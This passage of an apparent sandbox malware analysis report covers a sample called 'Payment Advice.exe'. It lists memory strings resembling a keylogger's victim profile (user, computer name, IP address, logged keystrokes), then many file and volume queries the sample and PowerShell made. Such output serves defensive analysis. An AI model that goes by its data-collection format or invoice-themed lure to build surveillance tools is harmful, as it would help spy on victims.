                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\^qDTime: 05/14/2024 14:57:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 81.181.57.52<br><hr><b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}r
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Time: 05/14/2024 14:57:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 81.181.57.52<br><hr><b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}r
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 181.57.52<br><hr><b>[ Program Manager]</b> (18/04/2024 23:53:25)<=
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q9<b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}rTHcq`
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Time: 05/14/2024 14:57:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 81.181.57.52<br><hr><b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}rTe^qdI
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q8<b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>{Win}THcq`
                    Source: C:\Users\user\Desktop\Payment Advice.exe Queries volume information: C:\Users\user\Desktop\Payment Advice.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Queries volume information: C:\Users\user\Desktop\Payment Advice.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
